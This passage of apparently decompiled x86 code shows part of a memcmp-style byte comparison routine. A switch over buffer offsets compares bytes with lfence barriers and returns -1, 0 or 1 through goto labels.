							if( *(_t942 - 0xc) ==  *(_t872 - 0xc)) {
								_t820 = 0;
								__eflags = 0;
								L125:
								if(_t820 != 0) {
									goto L145;
								}
								goto L126;
							}
							asm("lfence");
							_t884 = ( *(_t942 - 0xc) & 0x000000ff) - ( *(_t872 - 0xc) & 0x000000ff);
							if(_t884 != 0) {
								L121:
								_t820 = (0 | _t884 > 0x00000000) * 2 - 1;
								goto L125;
							}
							asm("lfence");
							_t884 = ( *(_t942 - 0xb) & 0x000000ff) - ( *(_t872 - 0xb) & 0x000000ff);
							if(_t884 != 0) {
								goto L121;
							}
							asm("lfence");
							_t884 = ( *(_t942 - 0xa) & 0x000000ff) - ( *(_t872 - 0xa) & 0x000000ff);
							if(_t884 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 9) & 0x000000ff) - ( *(_t872 - 9) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L125;
							}
							goto L121;
						case 0xd:
							L182:
							__eax =  *(__esi - 0xd);
							__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
							if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
								__ecx = 0;
								__eflags = 0;
								L190:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L191;
							}
							asm("lfence");
							__edi =  *(__esi - 0xd) & 0x000000ff;
							__eax =  *(__edx - 0xd) & 0x000000ff;
							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L186:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L190;
							}
							asm("lfence");
							__edi =  *(__esi - 0xc) & 0x000000ff;
							__eax =  *(__edx - 0xc) & 0x000000ff;
							__edi = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L186;
							}
							asm("lfence");
							__edi =  *(__esi - 0xb) & 0x000000ff;
							__eax =  *(__edx - 0xb) & 0x000000ff;
							__edi = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0xa) & 0x000000ff;
								__eax =  *(__edx - 0xa) & 0x000000ff;
								__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L190;
							}
							goto L186;
						case 0xe:
							L247:
							__eax =  *(__esi - 0xe);
							__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
							if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
								__ecx = 0;
								__eflags = 0;
								L255:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L256;
							}
							asm("lfence");
							__edi =  *(__esi - 0xe) & 0x000000ff;
							__eax =  *(__edx - 0xe) & 0x000000ff;
							__edi = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L251:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L255;
							}
							asm("lfence");
							__edi =  *(__esi - 0xd) & 0x000000ff;
							__eax =  *(__edx - 0xd) & 0x000000ff;
							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L251;
							}
							asm("lfence");
							__edi =  *(__esi - 0xc) & 0x000000ff;
							__eax =  *(__edx - 0xc) & 0x000000ff;
							__edi = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0xb) & 0x000000ff;
								__eax =  *(__edx - 0xb) & 0x000000ff;
								__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L255;
							}
							goto L251;
						case 0xf:
							L312:
							__eax =  *(__esi - 0xf);
							__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
							if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
								__ecx = 0;
								__eflags = 0;
								L320:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L321;
							}
							asm("lfence");
							__eax =  *(__edx - 0xf) & 0x000000ff;
							__edi =  *(__esi - 0xf) & 0x000000ff;
							__edi = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L316:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L320;
							}
							asm("lfence");
							__edi =  *(__esi - 0xe) & 0x000000ff;
							__eax =  *(__edx - 0xe) & 0x000000ff;
							__edi = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L316;
							}
							asm("lfence");
							__edi =  *(__esi - 0xd) & 0x000000ff;
							__eax =  *(__edx - 0xd) & 0x000000ff;
							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0xc) & 0x000000ff;
								__eax =  *(__edx - 0xc) & 0x000000ff;
								__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L320;
							}
							goto L316;
						case 0x10:
							L108:
							if( *(_t942 - 0x10) ==  *(_t872 - 0x10)) {
								_t820 = 0;
								__eflags = 0;
								L116:
								if(_t820 != 0) {
									goto L145;
								}
								goto L117;
							}
							asm("lfence");
							_t888 = ( *(_t942 - 0x10) & 0x000000ff) - ( *(_t872 - 0x10) & 0x000000ff);
							if(_t888 != 0) {
								L112:
								_t820 = (0 | _t888 > 0x00000000) * 2 - 1;
								goto L116;
							}
							asm("lfence");
							_t888 = ( *(_t942 - 0xf) & 0x000000ff) - ( *(_t872 - 0xf) & 0x000000ff);
							if(_t888 != 0) {
								goto L112;
							}
							asm("lfence");
							_t888 = ( *(_t942 - 0xe) & 0x000000ff) - ( *(_t872 - 0xe) & 0x000000ff);
							if(_t888 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 0xd) & 0x000000ff) - ( *(_t872 - 0xd) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L116;
							}
							goto L112;
						case 0x11:
							L173:
							__eax =  *(__esi - 0x11);
							__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
							if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
								__ecx = 0;
								__eflags = 0;
								L181:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L182;
							}
							asm("lfence");
							__edi =  *(__esi - 0x11) & 0x000000ff;
							__eax =  *(__edx - 0x11) & 0x000000ff;
							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L177:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L181;
							}
							asm("lfence");
							__edi =  *(__esi - 0x10) & 0x000000ff;
							__eax =  *(__edx - 0x10) & 0x000000ff;
							__edi = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L177;
							}
							asm("lfence");
							__edi =  *(__esi - 0xf) & 0x000000ff;
							__eax =  *(__edx - 0xf) & 0x000000ff;
							__edi = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0xe) & 0x000000ff;
								__eax =  *(__edx - 0xe) & 0x000000ff;
								__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L181;
							}
							goto L177;
						case 0x12:
							L238:
							__eax =  *(__esi - 0x12);
							__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
							if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
								__ecx = 0;
								__eflags = 0;
								L246:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L247;
							}
							asm("lfence");
							__edi =  *(__esi - 0x12) & 0x000000ff;
							__eax =  *(__edx - 0x12) & 0x000000ff;
							__edi = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L242:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L246;
							}
							asm("lfence");
							__edi =  *(__esi - 0x11) & 0x000000ff;
							__eax =  *(__edx - 0x11) & 0x000000ff;
							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L242;
							}
							asm("lfence");
							__edi =  *(__esi - 0x10) & 0x000000ff;
							__eax =  *(__edx - 0x10) & 0x000000ff;
							__edi = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0xf) & 0x000000ff;
								__eax =  *(__edx - 0xf) & 0x000000ff;
								__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L246;
							}
							goto L242;
						case 0x13:
							L303:
							__eax =  *(__esi - 0x13);
							__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
							if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
								__ecx = 0;
								__eflags = 0;
								L311:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L312;
							}
							asm("lfence");
							__edi =  *(__esi - 0x13) & 0x000000ff;
							__eax =  *(__edx - 0x13) & 0x000000ff;
							__edi = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L307:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L311;
							}
							asm("lfence");
							__edi =  *(__esi - 0x12) & 0x000000ff;
							__eax =  *(__edx - 0x12) & 0x000000ff;
							__edi = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L307;
							}
							asm("lfence");
							__edi =  *(__esi - 0x11) & 0x000000ff;
							__eax =  *(__edx - 0x11) & 0x000000ff;
							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x10) & 0x000000ff;
								__eax =  *(__edx - 0x10) & 0x000000ff;
								__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L311;
							}
							goto L307;
						case 0x14:
							L99:
							if( *(_t942 - 0x14) ==  *(_t872 - 0x14)) {
								_t820 = 0;
								__eflags = 0;
								L107:
								if(_t820 != 0) {
									goto L145;
								}
								goto L108;
							}
							asm("lfence");
							_t892 = ( *(_t942 - 0x14) & 0x000000ff) - ( *(_t872 - 0x14) & 0x000000ff);
							if(_t892 != 0) {
								L103:
								_t820 = (0 | _t892 > 0x00000000) * 2 - 1;
								goto L107;
							}
							asm("lfence");
							_t892 = ( *(_t942 - 0x13) & 0x000000ff) - ( *(_t872 - 0x13) & 0x000000ff);
							if(_t892 != 0) {
								goto L103;
							}
							asm("lfence");
							_t892 = ( *(_t942 - 0x12) & 0x000000ff) - ( *(_t872 - 0x12) & 0x000000ff);
							if(_t892 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 0x11) & 0x000000ff) - ( *(_t872 - 0x11) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L107;
							}
							goto L103;
						case 0x15:
							L164:
							__eax =  *(__esi - 0x15);
							__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
							if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
								__ecx = 0;
								__eflags = 0;
								L172:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L173;
							}
							asm("lfence");
							__edi =  *(__esi - 0x15) & 0x000000ff;
							__eax =  *(__edx - 0x15) & 0x000000ff;
							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L168:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L172;
							}
							asm("lfence");
							__edi =  *(__esi - 0x14) & 0x000000ff;
							__eax =  *(__edx - 0x14) & 0x000000ff;
							__edi = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L168;
							}
							asm("lfence");
							__edi =  *(__esi - 0x13) & 0x000000ff;
							__eax =  *(__edx - 0x13) & 0x000000ff;
							__edi = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x12) & 0x000000ff;
								__eax =  *(__edx - 0x12) & 0x000000ff;
								__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L172;
							}
							goto L168;
						case 0x16:
							L229:
							__eax =  *(__esi - 0x16);
							__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
							if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
								__ecx = 0;
								__eflags = 0;
								L237:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L238;
							}
							asm("lfence");
							__edi =  *(__esi - 0x16) & 0x000000ff;
							__eax =  *(__edx - 0x16) & 0x000000ff;
							__edi = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L233:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L237;
							}
							asm("lfence");
							__edi =  *(__esi - 0x15) & 0x000000ff;
							__eax =  *(__edx - 0x15) & 0x000000ff;
							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L233;
							}
							asm("lfence");
							__edi =  *(__esi - 0x14) & 0x000000ff;
							__eax =  *(__edx - 0x14) & 0x000000ff;
							__edi = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x13) & 0x000000ff;
								__eax =  *(__edx - 0x13) & 0x000000ff;
								__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L237;
							}
							goto L233;
						case 0x17:
							L294:
							__eax =  *(__esi - 0x17);
							__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
							if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
								__ecx = 0;
								__eflags = 0;
								L302:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L303;
							}
							asm("lfence");
							__edi =  *(__esi - 0x17) & 0x000000ff;
							__eax =  *(__edx - 0x17) & 0x000000ff;
							__edi = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L298:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L302;
							}
							asm("lfence");
							__edi =  *(__esi - 0x16) & 0x000000ff;
							__eax =  *(__edx - 0x16) & 0x000000ff;
							__edi = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L298;
							}
							asm("lfence");
							__edi =  *(__esi - 0x15) & 0x000000ff;
							__eax =  *(__edx - 0x15) & 0x000000ff;
							__edi = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x14) & 0x000000ff;
								__eax =  *(__edx - 0x14) & 0x000000ff;
								__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L302;
							}
							goto L298;
						case 0x18:
							L90:
							if( *(_t942 - 0x18) ==  *(_t872 - 0x18)) {
								_t820 = 0;
								__eflags = 0;
								L98:
								if(_t820 != 0) {
									goto L145;
								}
								goto L99;
							}
							asm("lfence");
							_t896 = ( *(_t942 - 0x18) & 0x000000ff) - ( *(_t872 - 0x18) & 0x000000ff);
							if(_t896 != 0) {
								L94:
								_t820 = (0 | _t896 > 0x00000000) * 2 - 1;
								goto L98;
							}
							asm("lfence");
							_t896 = ( *(_t942 - 0x17) & 0x000000ff) - ( *(_t872 - 0x17) & 0x000000ff);
							if(_t896 != 0) {
								goto L94;
							}
							asm("lfence");
							_t896 = ( *(_t942 - 0x16) & 0x000000ff) - ( *(_t872 - 0x16) & 0x000000ff);
							if(_t896 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 0x15) & 0x000000ff) - ( *(_t872 - 0x15) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L98;
							}
							goto L94;
						case 0x19:
							L155:
							__eax =  *(__esi - 0x19);
							__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
							if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
								__ecx = 0;
								__eflags = 0;
								L163:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L164;
							}
							asm("lfence");
							__edi =  *(__esi - 0x19) & 0x000000ff;
							__eax =  *(__edx - 0x19) & 0x000000ff;
							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L159:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L163;
							}
							asm("lfence");
							__edi =  *(__esi - 0x18) & 0x000000ff;
							__eax =  *(__edx - 0x18) & 0x000000ff;
							__edi = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L159;
							}
							asm("lfence");
							__edi =  *(__esi - 0x17) & 0x000000ff;
							__eax =  *(__edx - 0x17) & 0x000000ff;
							__edi = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x16) & 0x000000ff;
								__eax =  *(__edx - 0x16) & 0x000000ff;
								__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L163;
							}
							goto L159;
						case 0x1a:
							L220:
							__eax =  *(__esi - 0x1a);
							__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
							if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
								__ecx = 0;
								__eflags = 0;
								L228:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L229;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1a) & 0x000000ff;
							__eax =  *(__edx - 0x1a) & 0x000000ff;
							__edi = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L224:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L228;
							}
							asm("lfence");
							__edi =  *(__esi - 0x19) & 0x000000ff;
							__eax =  *(__edx - 0x19) & 0x000000ff;
							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L224;
							}
							asm("lfence");
							__edi =  *(__esi - 0x18) & 0x000000ff;
							__eax =  *(__edx - 0x18) & 0x000000ff;
							__edi = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x17) & 0x000000ff;
								__eax =  *(__edx - 0x17) & 0x000000ff;
								__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L228;
							}
							goto L224;
						case 0x1b:
							L285:
							__eax =  *(__esi - 0x1b);
							__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
							if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
								__ecx = 0;
								__eflags = 0;
								L293:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L294;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__eax =  *(__edx - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L289:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L293;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1a) & 0x000000ff;
							__eax =  *(__edx - 0x1a) & 0x000000ff;
							__edi = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L289;
							}
							asm("lfence");
							__edi =  *(__esi - 0x19) & 0x000000ff;
							__eax =  *(__edx - 0x19) & 0x000000ff;
							__edi = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x18) & 0x000000ff;
								__eax =  *(__edx - 0x18) & 0x000000ff;
								__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L293;
							}
							goto L289;
						case 0x1c:
							if( *(_t942 - 0x1c) ==  *(_t872 - 0x1c)) {
								_t820 = 0;
								__eflags = 0;
								L89:
								if(_t820 != 0) {
									goto L145;
								}
								goto L90;
							}
							asm("lfence");
							_t900 = ( *(_t942 - 0x1c) & 0x000000ff) - ( *(_t872 - 0x1c) & 0x000000ff);
							if(_t900 != 0) {
								L85:
								_t820 = (0 | _t900 > 0x00000000) * 2 - 1;
								goto L89;
							}
							asm("lfence");
							_t900 = ( *(_t942 - 0x1b) & 0x000000ff) - ( *(_t872 - 0x1b) & 0x000000ff);
							if(_t900 != 0) {
								goto L85;
							}
							asm("lfence");
							_t900 = ( *(_t942 - 0x1a) & 0x000000ff) - ( *(_t872 - 0x1a) & 0x000000ff);
							if(_t900 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 0x19) & 0x000000ff) - ( *(_t872 - 0x19) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L89;
							}
							goto L85;
						case 0x1d:
							__eax =  *(__esi - 0x1d);
							__eflags =  *(__esi - 0x1d) -  *(__edx - 0x1d);
							if( *(__esi - 0x1d) ==  *(__edx - 0x1d)) {
								__ecx = 0;
								__eflags = 0;
								L154:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L155;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__eax =  *(__edx - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L150:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L154;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__eax =  *(__edx - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L150;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__eax =  *(__edx - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__eax =  *(__edx - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L154;
							}
							goto L150;
						case 0x1e:
							__eax =  *(__esi - 0x1e);
							__eflags =  *(__esi - 0x1e) -  *(__edx - 0x1e);
							if( *(__esi - 0x1e) ==  *(__edx - 0x1e)) {
								__ecx = 0;
								__eflags = 0;
								L219:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L220;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1e) & 0x000000ff;
							__eax =  *(__edx - 0x1e) & 0x000000ff;
							__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L215:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L219;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__eax =  *(__edx - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L215;
							}
							asm("lfence");
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__eax =  *(__edx - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
